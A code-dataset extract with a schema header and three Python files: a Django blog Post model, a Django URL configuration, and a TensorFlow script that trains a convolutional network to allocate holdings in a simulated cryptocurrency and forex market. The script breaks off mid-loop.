blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c6ad23573189e89a657dbedf5813bc172c22b7cd
|
24b08fe0f9aaf1ae36d592b4e9610bccc0c275e4
|
/blog/models.py
|
4b7421680e7e743425fc6807bd86f59f015be5e0
|
[] |
no_license
|
snehmankad/Corey-Schafer-Django-Blog
|
4108f56365982e4588985e374640ae01b5a94980
|
f33530d57b6cf1e8dc6eca8b821e51fb16b1c811
|
refs/heads/master
| 2022-12-15T19:25:13.608175
| 2020-09-06T20:45:57
| 2020-09-06T20:45:57
| 293,356,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 547
|
py
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length = 100)
content = models.TextField()
date_posted = models.DateTimeField(default=timezone.now)
author = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('post-detail', kwargs={'pk':self.pk})
|
[
"52824859+snehmankad@users.noreply.github.com"
] |
52824859+snehmankad@users.noreply.github.com
|
b3885f80a7017c005cf61766beb7ddaa0369d604
|
bba0159d2991ed8e8450cd85d902b89cf6b486f3
|
/config/urls.py
|
c38338a8ed25b8b7a7b3c255370c3e5dfea56754
|
[
"MIT"
] |
permissive
|
dzhfrv/django-base-app
|
548562f1cb4109f68f4a7e6c104691abe1a6762c
|
9dcc27a2e75e7aa3c6d31b468f089e0b70f52df9
|
refs/heads/main
| 2023-01-02T13:15:11.612938
| 2020-10-29T18:14:11
| 2020-10-29T18:14:11
| 308,393,941
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
from django.contrib import admin
from django.urls import path, include
v1 = [
path('v1/', include('apps.user.urls')),
]
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', include(v1)),
]
|
[
"solomonickey@gmail.com"
] |
solomonickey@gmail.com
|
0eba2e2b51b28f73626d4731ff56290996caf4eb
|
62494569ad62bae44c13499dc222ffa0301541cb
|
/Final Code/3. Train Network.py
|
6b08d436b95f8e9ff96d5cd3d7ee455c3551e972
|
[] |
no_license
|
rendorHaevyn/Project_WinLife
|
b1f5c71a338b366cfe094e7aef296bc982e52a2f
|
ef409e7e56c57a17ccb69f2183ddca42cae0039a
|
refs/heads/master
| 2021-07-09T15:20:03.979369
| 2018-12-09T22:08:28
| 2018-12-09T22:08:28
| 132,147,130
| 0
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51,940
|
py
|
from __future__ import print_function
import numpy as np
import random
import pandas as pd
import sklearn
import sklearn.decomposition
import sklearn.ensemble
import sklearn.preprocessing
import sklearn.cluster
from sklearn import *
import math
import gc
import os
import sys
import itertools
import threading
from matplotlib import pyplot as plt
import matplotlib.colors
import tensorflow as tf
import re
import time
import pickle
import Constants
import gym
import copy
import gc
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from sklearn.cluster import KMeans
import numpy as np
from scipy.spatial.distance import cdist, pdist
# Utility Function to return True / False regex matching
def pattern_match(patt, string):
return re.findall(patt, string) != []
# Utility Function to save objects in memory to a file
def save_memory(obj, path):
return pickle.dump(obj, open(path, "wb"))
# Utility Function to load objects from the harddisk
def load_memory(path):
return pickle.load(open(path, "rb"))
gc.collect()
try:
os.mkdir(Constants.SAVE_PATH)
except FileExistsError as e1:
pass
except OSError as e2:
print('Failed to create directory {} - Incorrect syntax?'.format(Constants.SAVE_PATH))
except:
print('Error occurred - {}.'.format(sys.exc_info()[0]))
############################ START BLACKJACK CLASS ############################
class Market(gym.Env):
"""Trading Market environment"""
def randomIndex(self):
return random.randint(0, len(self.TRAIN)-self.DISCOUNT_STEPS - 10)
def __init__(self, dataFile = None, COINS_IN = [], COINS_OUT = [], short = False):
gc.collect()
self.data = dataFile
self.data = self.data.dropna(axis=0, how='any').reset_index(drop=True)
cut_off_date = int(time.mktime(time.strptime('01/04/2018', "%d/%m/%Y"))) * 1000
self.data = self.data[self.data.date > cut_off_date].reset_index(drop=True)
self.data['reward_USD'] = 0
if COINS_OUT == []:
COINS_OUT = ['USD'] + [x.replace('close_','') for x in self.data.columns if "close_" in x]
self.COINS = COINS_OUT
print("{} rows & {} columns".format(len(self.data), len(self.data.columns)))
#--------------------------------------------------------------------------------------
# Manual Options
#--------------------------------------------------------------------------------------
self.COMMISSION = 1e-10 # Commision % as a decimal to use in loss function
self.NORMALIZE = True # Normalize Data
self.ALLOW_SHORTS = True # Allow Shorts or not
self.GAMMA = 0.5 # The discount factor
self.DISCOUNT_STEPS = 5 # Number of periods to look ahead for discounting
self.TRAIN_PERCENT = 0.75 # Percentage of data to use as training
self.MULTS = 1 # How many future rewards to include in output
#--------------------------------------------------------------------------------------
# List of coins data to use as input variables. Set to [] to use all coins
#--------------------------------------------------------------------------------------
self.N_COINS = len(self.COINS)#( len(self.COINS) * 2 - 1 ) if self.ALLOW_SHORTS else len(self.COINS)
#--------------------------------------------------------------------------------------
# Create a list of X column names to use for modelling
#--------------------------------------------------------------------------------------
the_coins = []
if COINS_IN == []:
for c in self.data.columns:
if "reward_" in c and c != "reward_USD" and not c.endswith("_S") and c.replace("reward_","") not in the_coins:
the_coins.append(c.replace("reward_",""))
else:
for c in self.data.columns:
if "reward_" in c and c != "reward_USD" and not c.endswith("_S") and c.replace("reward_","") not in the_coins:
the_coin = c.replace("reward_","")
if the_coin in COINS_IN:
the_coins.append(the_coin)
self.COINS_IN = the_coins
in_cols = []
for c in self.data.columns:
if "DAY_OF_WEEK" in c or "HOUR_OF_DAY" in c:
in_cols.append(c)
continue
for a in sorted(set(the_coins)):
if "_"+a in c:
in_cols.append(c)
COLS_X = []
for x in in_cols:
if "reward_" in x or "train_" in x:
continue
COLS_X.append(x)
#for c in self.data.columns:
# if "limit" in c:
# self.data[c.replace("limit","reward")] = self.data[c]
#--------------------------------------------------------------------------------------
# Create a list of Y column names to use for modelling
#--------------------------------------------------------------------------------------
COLS_Y = [] if "USD" not in self.COINS and "USDT" not in self.COINS else ["reward_USD"]
for c in self.data.columns:
added = False
if 'reward' in c and (c != 'reward_USD' and c not in COLS_Y):
if COINS_OUT == []:
COLS_Y += [c]
added = True
else:
for a in sorted(set(self.COINS)):
if c == "reward_" + a and c not in COLS_Y:
COLS_Y += [c]
print("added reward:", c)
added = True
if added:
#self.data[c+"_S"] = self.data[c].apply(lambda x : math.log10(2-10**x))
self.data[c+"_S"] = self.data[c].apply(lambda x : -x)
if self.ALLOW_SHORTS:
COLS_Y += ["{}_S".format(y) for y in COLS_Y if y != "reward_USD"]
current_ys = copy.deepcopy(COLS_Y)
for ahead in range(1, self.MULTS):
for y in current_ys:
c = y + "_" + str(ahead + 1)
self.data[c] = self.data[y].shift(-ahead)
COLS_Y.append(c)
self.N_CRYPTO = len([1 for y in COLS_Y if y != "reward_USD" and not y.endswith("_S")])
PORT_W = [w.replace("reward_", "MARGIN_") for w in COLS_Y]
for p in PORT_W:
self.data[p] = 0
self.data["MARGIN_USD"] = 1
if self.COMMISSION != 0:
COLS_X += PORT_W
# Hard-code in spread
for x in COLS_Y:
if x in ("train_USD", "reward_USD"):
continue
self.data[x] = self.data[x].apply(lambda x : x + math.log10(1-0.0/4000))
COLS_Y_TRAIN = [x.replace("reward_","train_") for x in COLS_Y]
print(COLS_Y)
print(COLS_Y_TRAIN)
for y_pos in range(len(COLS_Y_TRAIN)):
train_col = COLS_Y_TRAIN[y_pos]
orig_col = COLS_Y[y_pos]
stmt = "self.data['{}'] = self.data['{}']".format(train_col, orig_col)
for ahead in range(1,self.DISCOUNT_STEPS+1):
stmt += "+(self.GAMMA**{}) * self.data['{}'].shift({})".format(ahead, orig_col, -ahead)
#for ahead in range(1,self.DISCOUNT_STEPS+1):
# stmt += "+((0.25*self.GAMMA)**{}) * self.data['{}'].shift({})".format(ahead, orig_col, ahead)
#stmt += "+ math.log10(1 - 0.0001)"
print("Calculating Discount Rewards...", end="")
exec(stmt)
self.COLS_Y_TRAIN = COLS_Y_TRAIN
self.data = self.data.dropna(axis=0, how='any').reset_index(drop=True)
#for c in COLS_Y:
# if "USD" in c:
# continue
# self.data[c] = self.data[c] + math.log10(1 - self.COMMISSION)
#self.data = self.data.dropna(axis=0, how='any').reset_index(drop=True)
#--------------------------------------------------------------------------------------
# Split Train/Test
#--------------------------------------------------------------------------------------
train_idx = int( self.TRAIN_PERCENT * len(self.data) )
#--------------------------------------------------------------------------------------
# Normalizing the X columns. Scale using training data only
#--------------------------------------------------------------------------------------
self.SCALE_DICT = {}
if self.NORMALIZE:
'''print("Normalizing Data...", end="")
scaler = sklearn.preprocessing.StandardScaler()
print("Fitting Scaler: {}".format(len(COLS_X)))
scaler.fit( self.data[:train_idx][COLS_X] )
print("Using Scaler: {}".format(len(COLS_X)))
self.data[COLS_X] = scaler.transform(self.data[COLS_X])
self.SAVE_SCALER = scaler
self.SAVE_SCALER_COLS = COLS_X'''
#def scale_col(dat, x, mu, sd):
# dat[x] = dat[x].apply(lambda x : (x-mu)/sd)
# print("Scaled {}".format(x))
#norm_threads = []
descriptions = self.data[:train_idx].describe()
for i, x in enumerate(COLS_X):
if "MARGIN" in x or 'date' in x or "close_" in x or "open_" in x or "low_" in x or "high_" in x:
continue
mu, sd = descriptions[x]['mean'], descriptions[x]['std']
print("Normalizing {} - {} / {} {:.5f}, {:.5f}".format(x, (i+1), len(COLS_X), mu, sd))
self.SCALE_DICT[x] = (mu, sd)
self.data[x] = self.data[x].apply(lambda x : (x-mu)/sd)
#thr = threading.Thread(target=scale_col, args=(self.data, x, mu, sd))
#norm_threads.append(thr)
#norm_threads[-1].start()
#for thr in norm_threads:
# thr.join()
print("Done")
self.TRAIN = self.data[:train_idx].reset_index(drop=True)
#self.TEST = self.TRAIN
self.TEST = self.data[train_idx:].reset_index(drop=True)
fee_rate = 0.002/100
self.TRAIN_HOLD = copy.deepcopy(self.TRAIN)
self.TRAIN_HOLD[PORT_W] = 0 # Set all holdings to 0
self.TRAIN_HOLD[PORT_W[0]] = 1 # Set first holding to 1
self.TRAIN_HOLD[COLS_Y_TRAIN] += 2 * math.log10(1 - fee_rate) # Add transaction cost to all rewards
self.TRAIN_HOLD[COLS_Y_TRAIN[0]] -= 2 * math.log10(1 - fee_rate) # Remove it from the one we're holding
for i, y in enumerate(COLS_Y):
if i == 0:
continue
new = copy.deepcopy(self.TRAIN)
new[PORT_W] = 0 # Set all holdings to 0
new[PORT_W[i]] = 1 # Set first holding to 1
new[COLS_Y_TRAIN] += 2 * math.log10(1 - fee_rate) # Add transaction cost to all rewards
new[COLS_Y_TRAIN[i]] -= 2 * math.log10(1 - fee_rate) # Remove it from the one we're holding
if COLS_Y[0] == "reward_USD":
new[COLS_Y_TRAIN[0]] -= 1 * math.log10(1 - fee_rate) # Remove it from the one we're holding
self.TRAIN_HOLD = self.TRAIN_HOLD.append(new)
self.TRAIN_HOLD.reset_index(inplace=True)
self.COLS_X = COLS_X
self.COLS_Y = COLS_Y
self.N_IN = len(COLS_X)
self.N_OUT = len(COLS_Y)
self.holdings = {}
for i, c in enumerate(sorted(self.COLS_Y)):
self.holdings[c.replace("reward_","")] = 0
self.holdings['USD'] = 1
self.position = self.randomIndex()
self.ACTIONS = [x.replace("reward_","") for x in self.COLS_Y]
self.PORT_W = PORT_W
self.N_CRYPTO_IN = len(self.COINS_IN)
print("CRYPTO_IN:" + str(self.COINS_IN))
self.PREV_W_COLS = PORT_W
gc.collect()
print("Market Data Loaded")
def save(self):
items = [ (self.SCALE_DICT, "{}\\SCALE_DICT.save".format(Constants.SAVE_PATH)),
(self.PRICE_TENSOR_COLS, "{}\\PRICE_TENSOR_COLS.save".format(Constants.SAVE_PATH)),
(self.PRICE_LAGS, "{}\\PRICE_LAGS.save".format(Constants.SAVE_PATH))]
for i in items:
try:
save_memory(i[0], i[1])
except:
pass
def step(self, action):
rw = 0
self.COMM_REWARD = math.log10(1 - self.COMMISSION)
act_loc = M.ACTIONS.index(action)
if self.TRAIN.at[self.position, self.PORT_W[act_loc]] == 1:
rw = 0
elif action in ("USD", "USDT") or self.TRAIN.at[self.position, "MARGIN_USD"] == 1:#\
#(self.TRAIN.at[self.position, "MARGIN_USD"] == 1 and action not in ("USD", "USDT")):
rw = 1 * self.COMM_REWARD
else:
rw = 2 * self.COMM_REWARD
rw += self.TRAIN.at[self.position, "reward_{}".format(action)]
self.position += 1
for w in self.PORT_W:
self.TRAIN.set_value(self.position, w, 0)
self.TRAIN.set_value(self.position, self.PORT_W[act_loc], 1)
if np.isnan(rw):
print(self.position, action, self.holdings)
return rw
############################ END MARKET CLASS ############################
raw_data = pd.read_csv("Data/Crypto/5m/ALL_MOD.csv")
#raw_data = pd.read_csv("Data/Forex/15m/ALL_MOD.csv")
#M = Market(raw_data,
# COINS_IN = ['BTC', 'EOS', 'ETC', 'ETH', 'IOTA', 'LTC', 'XRP'],
# COINS_OUT = ['BTC', 'EOS', 'ETC', 'ETH', 'IOTA', 'LTC', 'XRP'])
fx_pairs_in = ['AUDCAD', 'AUDJPY', 'AUDNZD', 'AUDUSD', 'CADJPY', 'EURAUD', 'EURCAD', 'EURGBP',
'EURJPY', 'EURNZD', 'EURUSD', 'GBPAUD', 'GBPCAD', 'GBPJPY', 'GBPNZD', 'GBPUSD',
'NZDCAD', 'NZDJPY', 'NZDUSD', 'USDCAD', 'USDJPY', 'USDOLLAR']
fx_pairs_out = ['AUDCAD', 'AUDJPY', 'AUDNZD', 'AUDUSD', 'CADJPY', 'EURAUD', 'EURCAD', 'EURGBP',
'EURJPY', 'EURNZD', 'EURUSD', 'GBPAUD', 'GBPCAD', 'GBPJPY', 'GBPNZD', 'GBPUSD',
'NZDCAD', 'NZDJPY', 'NZDUSD', 'USDCAD', 'USDJPY']
fx_pairs = ['USD', 'AUDUSD', 'EURUSD', 'GBPJPY', 'AUDJPY', 'GBPUSD', 'USDJPY', 'EURAUD', 'EURJPY']
M = Market(raw_data,
COINS_IN = ["BMXBTCUSD", "BFXBTCUSDT", "BINBTCUSDT", "GDXBTCUSD", "BFXXRPUSDT", "BINETHUSDT"],
COINS_OUT = ["BMXBTCUSD"])
#M = Market(raw_data,
# COINS_IN = ["AUDJPY", "AUDUSD", "GBPJPY", "GBPUSD", "EURUSD", "NZDUSD", "EURCAD", "USDJPY"],
# COINS_OUT = ['USDJPY'])
X2 = []
for x in M.data.columns:
channel_rank = 1000
lag_rank = 1000
channel_rank = 0 if "L_CLOSE" in x else channel_rank
channel_rank = 1 if "L_LOW" in x else channel_rank
channel_rank = 2 if "L_HIGH" in x else channel_rank
channel_rank = 3 if "L_VOLUME" in x else channel_rank
channel_rank = 4 if "L_VOLPRICE" in x else channel_rank
channel_rank = 5 if "L2_CLOSE" in x else channel_rank
channel_rank = 6 if "L2_LOW" in x else channel_rank
channel_rank = 7 if "L2_HIGH" in x else channel_rank
channel_rank = 8 if "L3_CLOSE" in x else channel_rank
channel_rank = 9 if "L3_LOW" in x else channel_rank
channel_rank = 10 if "L3_HIGH" in x else channel_rank
channel_rank = 11 if "SMACLOSE1" in x else channel_rank
channel_rank = 12 if "SMACLOSE2" in x else channel_rank
channel_rank = 13 if "SMACLOSE3" in x else channel_rank
channel_rank = 14 if "SMACLOSE4" in x else channel_rank
channel_rank = 15 if "SMACLOSE5" in x else channel_rank
channel_rank = 16 if "SMALOW1" in x else channel_rank
channel_rank = 17 if "SMALOW2" in x else channel_rank
channel_rank = 18 if "SMALOW3" in x else channel_rank
channel_rank = 19 if "SMALOW4" in x else channel_rank
channel_rank = 20 if "SMALOW5" in x else channel_rank
channel_rank = 21 if "SMAHIGH1" in x else channel_rank
channel_rank = 22 if "SMAHIGH2" in x else channel_rank
channel_rank = 23 if "SMAHIGH3" in x else channel_rank
channel_rank = 24 if "SMAHIGH4" in x else channel_rank
channel_rank = 25 if "SMAHIGH5" in x else channel_rank
channel_rank = 26 if "RSI1" in x else channel_rank
channel_rank = 27 if "RSI2" in x else channel_rank
channel_rank = 28 if "RSI3" in x else channel_rank
channel_rank = 29 if "RSI4" in x else channel_rank
channel_rank = 30 if "RSI5" in x else channel_rank
#channel_rank = 29 if "SUPPORT1" in x else channel_rank
#channel_rank = 30 if "RESIST1" in x else channel_rank
channel_rank = 31 if "LINEAR1" in x else channel_rank
channel_rank = 32 if "LINEAR2" in x else channel_rank
channel_rank = 33 if "LINEAR3" in x else channel_rank
S_COINS = sorted(M.COINS_IN)
coin_rank = -1
for i, c in enumerate(S_COINS):
if x.endswith("_"+c):
coin_rank = i
break
try:
lag_rank = int("".join([ch for ch in x[x.index("_"):] if ch in '0123456789']))
lag_rank *= -1
except:
pass
if coin_rank < 0:
continue
X2.append( (coin_rank, lag_rank, channel_rank, x) )
X2.sort(key = lambda x : (x[0], x[1], x[2]))
PRICE_TENSOR = [(x[-1], x[-2], x[-3]) for x in X2 if 0 <= x[2] < 1000]
cols = list(M.data.columns)
PRICE_LAGS = len(set([x[2] for x in PRICE_TENSOR]))
PRICE_CHANNELS = len(set([x[1] for x in PRICE_TENSOR]))
PRICE_TENSOR_COLS = [x[0] for x in PRICE_TENSOR]
PRICE_TENSOR_IDX = [cols.index(x) for x in PRICE_TENSOR_COLS]
M.PRICE_LAGS = PRICE_LAGS
M.PRICE_TENSOR_COLS = PRICE_TENSOR_COLS
MU_SD_TABLE = M.TRAIN[PRICE_TENSOR_COLS].describe()
USE_SIGMOID = True
N_COINS = M.N_COINS
N_CRYPTO = M.N_CRYPTO_IN
N_IN = M.N_IN
N_OUT = M.N_OUT
TIMESTEP_DAYS = 86400000 / (M.data.date - M.data.date.shift(1)).describe()['50%']
with tf.device("/GPU:0"):
# PrevW
HOLD_W = tf.placeholder(tf.float32, [None, N_OUT])
HOLD_W = tf.reshape(HOLD_W, [-1, N_OUT])
# Actual Rewards
Y_ = tf.placeholder(tf.float32, [None, N_OUT])
Q_TARGET = tf.placeholder(tf.float32, [None, N_OUT])
Q_TARGET = tf.reshape(Q_TARGET, [-1, N_OUT])
keep_p1 = tf.placeholder(tf.float32, name = 'keep1')
keep_p2 = tf.placeholder(tf.float32, name = 'keep2')
keep_p3 = tf.placeholder(tf.float32, name = 'keep3')
#--------------------------------------------------------------------------------------
# Define Neural Network layers
#--------------------------------------------------------------------------------------
h_1 = 1
w_1 = 1
CH_OUT_1 = 20
FILTER1 = [h_1, w_1, PRICE_CHANNELS, CH_OUT_1] # Filter 1 x 3 x 3, Input has 4 channels
h_2 = 1
w_2 = PRICE_LAGS - w_1 + 1
CH_OUT_2 = 50
FILTER2 = [h_2, w_2, CH_OUT_1, CH_OUT_2]
# Final
h_f = N_CRYPTO
w_f = 1
CH_OUT_f = 100
FILTERf = [h_f, w_f, CH_OUT_2, CH_OUT_f]
SDEV = 1
BIAS_MULT = 0
initializer = tf.contrib.layers.xavier_initializer()
initializer_cnn = tf.contrib.layers.xavier_initializer_conv2d()
X_PRICE_TENSOR = tf.placeholder(tf.float32, [None, len(PRICE_TENSOR_COLS)])
X_PRICE_TENSOR_NN = tf.reshape(X_PRICE_TENSOR, [-1, N_CRYPTO, PRICE_LAGS, PRICE_CHANNELS])
#X_PRICE_TENSOR_NN_AVG = tf.nn.avg_pool(X_PRICE_TENSOR_NN, [1,1,3,1], [1,1,3,1], 'VALID')
X_SCALER = tf.Variable(tf.ones([N_CRYPTO, 1, PRICE_CHANNELS]))
X_SCALER2 = tf.Variable(tf.ones([1, PRICE_LAGS, PRICE_CHANNELS]))
X_PRICE_TENSOR_NN_AVG = X_PRICE_TENSOR_NN
#X_PRICE_TENSOR_NN_AVG = tf.round(4 * X_PRICE_TENSOR_NN) / 4
X_PRICE_TENSOR_NN_AVG = tf.multiply(X_PRICE_TENSOR_NN_AVG, X_SCALER)
X_PRICE_TENSOR_NN_AVG = tf.multiply(X_PRICE_TENSOR_NN_AVG, X_SCALER2)
LEAKY_ALPHA = 0.05
# LAYER 1
CW1 = tf.Variable(tf.random_normal(FILTER1, stddev = SDEV * (1/(h_1*w_1*PRICE_CHANNELS))**0.5 ))
CB1 = tf.Variable(tf.zeros([CH_OUT_1]))
CL1 = tf.nn.leaky_relu(tf.nn.conv2d(X_PRICE_TENSOR_NN_AVG, CW1, [1,1,1,1], padding="VALID") + CB1 * BIAS_MULT, LEAKY_ALPHA)
CL1 = tf.nn.dropout(CL1, keep_p1)
# LAYER 2
CW2 = tf.Variable(tf.random_normal(FILTER2, stddev = SDEV * (1/(h_2*w_2*CH_OUT_1))**0.5))
CB2 = tf.Variable(tf.zeros([CH_OUT_2]))
CL2 = tf.nn.leaky_relu(tf.nn.conv2d(CL1, CW2, [1,1,1,1], padding="VALID") + CB2 * BIAS_MULT, LEAKY_ALPHA)
CL2 = tf.nn.dropout(CL2, keep_p2)
CW4 = tf.Variable(tf.random_normal(FILTERf, stddev = SDEV * (1/(h_f*w_f*CH_OUT_f))**0.5))
CB4 = tf.Variable(tf.zeros([CH_OUT_f]))
CL4 = tf.nn.relu(tf.nn.conv2d(CL2, CW4, [1,1,1,1], padding="VALID") + CB4 * BIAS_MULT)
CL4 = tf.nn.dropout(CL4, keep_p3)
CL_flat = tf.reshape(CL4, (-1, CH_OUT_f * N_CRYPTO//h_f))
CL_flat = tf.concat( [CL_flat, HOLD_W], -1)
fc_w = tf.Variable( initializer([int(CL_flat.shape[-1]), 100]) )
fc_b = tf.Variable( initializer([100]) )
fc_w2 = tf.Variable( initializer([100, N_OUT]) )
fc_b2 = tf.Variable( initializer([N_OUT]) )
LOSS_L2 = tf.nn.l2_loss(fc_w)
Q_UNSCALED1 = tf.nn.relu(tf.matmul(CL_flat, fc_w) + fc_b * BIAS_MULT)
Q_UNSCALED1 = tf.nn.dropout(Q_UNSCALED1, keep_p3)
Q_UNSCALED = tf.matmul(Q_UNSCALED1, fc_w2) + fc_b2 * BIAS_MULT
Q_UNSCALED = tf.nn.dropout(Q_UNSCALED, keep_p3)
if USE_SIGMOID:
Q_PREDICT = tf.nn.sigmoid(Q_UNSCALED)
else:
#Q_PREDICT = Q_UNSCALED
Q_PREDICT = tf.nn.softmax(Q_UNSCALED, 1)
#--------------------------------------------------------------------------------------
# Define Loss Functions
#--------------------------------------------------------------------------------------
q_predict_mean, q_predict_var = tf.nn.moments(Q_PREDICT, axes=[1])
all_returns = tf.reduce_sum(Q_PREDICT * Q_TARGET, 1)
all_returns2 = tf.nn.relu( tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) ** 0.8 - \
tf.nn.relu( -tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) ** 0.8
loss_func = -tf.reduce_mean(all_returns)
r_mean, r_var = tf.nn.moments(all_returns, axes=[0])
sharpe_loss = -r_mean / (r_var**0.5)
winning_trades = tf.nn.relu(all_returns)
winning_trades_mean = tf.reduce_mean(winning_trades)
losing_trades = tf.nn.relu(-all_returns)
losing_trades_mean = tf.reduce_mean(losing_trades)
winning_trades2 = tf.nn.relu(all_returns2)
winning_trades_mean2 = tf.reduce_mean(winning_trades2)
losing_trades2 = tf.nn.relu(-all_returns2)
losing_trades_mean2 = tf.reduce_mean(losing_trades2)
#min_func = -tf.reduce_mean(tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) * math.e**-r_stdev
opt_func = (winning_trades_mean2/losing_trades_mean2) * (-tf.reduce_mean(all_returns2) + 0.1 * tf.reduce_mean(losing_trades2))# - \
#opt_func = -tf.reduce_mean(winning_trades) / tf.reduce_mean(losing_trades)# - \
#1e-7 * tf.reduce_min(all_returns)
#opt_func = -tf.reduce_mean(tf.reduce_sum(Q_PREDICT * Q_TARGET, 1) ) * math.e**-r_var
#opt_func = -tf.reduce_sum(all_returns)# + 0.5*tf.reduce_sum(losing_trades)
#opt_func = tf.reduce_sum(tf.square(Q_PREDICT - Q_TARGET), 0)
opt_func = -tf.reduce_mean(all_returns2)
#loss_func = -tf.reduce_sum(Q_PREDICT * Q_TARGET) \
# - math.log10(1-M.COMMISSION)*tf.reduce_sum( tf.abs(tf.reduce_sum(Q_PREDICT[1:,:] - Q_PREDICT[:-1,:], 1) ) )
LR_START = 0.0005
# Optimizer
LEARNING_RATE = tf.Variable(LR_START, trainable=False)
optimizer = tf.train.AdamOptimizer(LEARNING_RATE)#(LEARNING_RATE)
train_step = optimizer.minimize(1e2 * opt_func)
#--------------------------------------------------------------------------------------
# Begin Tensorflow Session
#--------------------------------------------------------------------------------------
init = tf.global_variables_initializer()
config = tf.ConfigProto()
config.intra_op_parallelism_threads = 32
config.log_device_placement = True
sess = tf.Session(config=config)
sess.run(init)
# probability of picking a random action. This decays over time
epsilon = 0.1
all_rewards = [] # Holds all observed rewards. The rolling mean of rewards should improve as the network learns
all_Qs = [] # Holds all predicted Q values. Useful as a sanity check once the network is trained
all_losses = [] # Holds all the (Q_TARGET - Q_PREDICTED) values. The rolling mean of this should decrease
Q_TARGETS = []
Q_PREDS = []
PRICE_STATES = []
H_WEIGHTS = []
Q_CONVERGE = {} # Not used yet
projections = []
watch = Constants.Stopwatch()
train_losses, test_losses, transf_losses, opt_losses = [], [], [], []
gc.collect()
episode = 0
smallest_loss = 1e6
while episode < 1000000:
init_pos = episode % (len(M.TRAIN)-50)#
#init_pos = M.randomIndex()
M.position = init_pos
USD_STATE = None
USD_PRICE_STATE = None
Q_USD = 0
W_USD = 0
'''if episode == 100:
update_LR = tf.assign(LEARNING_RATE, 0.001)
sess.run(update_LR)'''
for w_index, starting_w in enumerate(M.PORT_W):
watch.start('update_W')
M.position = init_pos
for w in M.PORT_W:
M.TRAIN.set_value(M.position, w, 0)
M.TRAIN.set_value(M.position, starting_w, 1)
watch.end('update_W')
watch.start('set_state')
init_price_state = np.array(M.TRAIN.iloc[M.position, PRICE_TENSOR_IDX])
watch.end('set_state')
watch.start('Q_PREDICT')
Q1 = sess.run(Q_PREDICT, feed_dict = {
X_PRICE_TENSOR : np.reshape(init_price_state,(-1, len(PRICE_TENSOR_COLS)) ),
HOLD_W : np.array(M.TRAIN.ix[M.position, M.PORT_W]).reshape( (-1, N_OUT) ),
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
watch.end('Q_PREDICT')
if w_index == 0:
USD_PRICE_STATE = init_price_state
Q_USD = Q1
W_USD = np.array(M.TRAIN.ix[M.position, M.PORT_W]).reshape( (-1, N_OUT) )
targetQ = list(Q1[0])
for act_num, begin_act in enumerate(M.ACTIONS):
M.position = init_pos
for w in M.PORT_W:
M.TRAIN.set_value(M.position, w, 0)
M.TRAIN.set_value(M.position, starting_w, 1)
#print(M.TRAIN.loc[M.position, M.PORT_W])
watch.start("market_step")
#G = M.step(begin_act)
#Gpercent = 100*(10**G-1)
#G = math.log10(1+int(Gpercent*8)/800)
profit = M.TRAIN.at[M.position, M.COLS_Y_TRAIN[act_num]]
G = profit
M.position += 1
watch.end("market_step")
for t in range(0):#M.DISCOUNT_STEPS):
state = np.array(M.TRAIN.loc[M.position, M.COLS_X])
price_state = np.array(M.TRAIN.loc[M.position, PRICE_TENSOR_COLS])
if random.random() < epsilon:
act = random.choice(M.ACTIONS)
else:
Q = sess.run(Q_PREDICT, feed_dict = {
X_PRICE_TENSOR : price_state.reshape(-1, len(PRICE_TENSOR_COLS)),
HOLD_W : np.array(M.TRAIN.ix[M.position, M.PORT_W]).reshape( (-1, N_OUT) ),
keep_p1 : 1, keep_p2 : 1, keep_p3 : 1} )
act = M.ACTIONS[np.argmax(Q)]
if t == M.DISCOUNT_STEPS-1 and episode > 1000:
G += M.GAMMA ** (t+1) * max(Q[0])
else:
G += M.GAMMA ** (t+1) * M.step(act)
#for w in M.PORT_W:
# M.TRAIN.set_value(M.position, w, 0)
#M.TRAIN.set_value(M.position, M.PORT_W[M.ACTIONS.index(act)], 1)
targetQ[act_num] = G
PRICE_STATES.append(init_price_state)
Q_PREDS.append(Q1)
Q_TARGETS.append(targetQ)
H_WEIGHTS.append(M.TRAIN.ix[init_pos, M.PORT_W])
if w_index == 0:
usd_target = copy.deepcopy(targetQ)
break
num_depth = 1+max(0, math.log(episode+1)-2)+len(M.TRAIN)#*0.15
num_depth = len(M.TRAIN)
#num_depth = 1024
if len(Q_TARGETS) >= num_depth or True:
COL_W = '\033[0m' # white (normal)
COL_R = '\033[41m' # red
COL_G = '\033[42m' # green
COL_O = '\033[33m' # orange
COL_B = '\033[34m' # blue
COL_P = '\033[35m' # purple
#update_drop_rt = tf.assign(tf_keep_prob, 0.7)
#sess.run(update_drop_rt)
#the_x = np.reshape( np.array(X_STATES), (-1, N_IN) )
the_p = np.reshape( np.array(PRICE_STATES), (-1, len(PRICE_TENSOR_COLS)))
the_q = np.reshape( np.array(Q_TARGETS), (-1, N_OUT))
the_w = np.reshape( np.array(H_WEIGHTS), (-1, N_OUT))
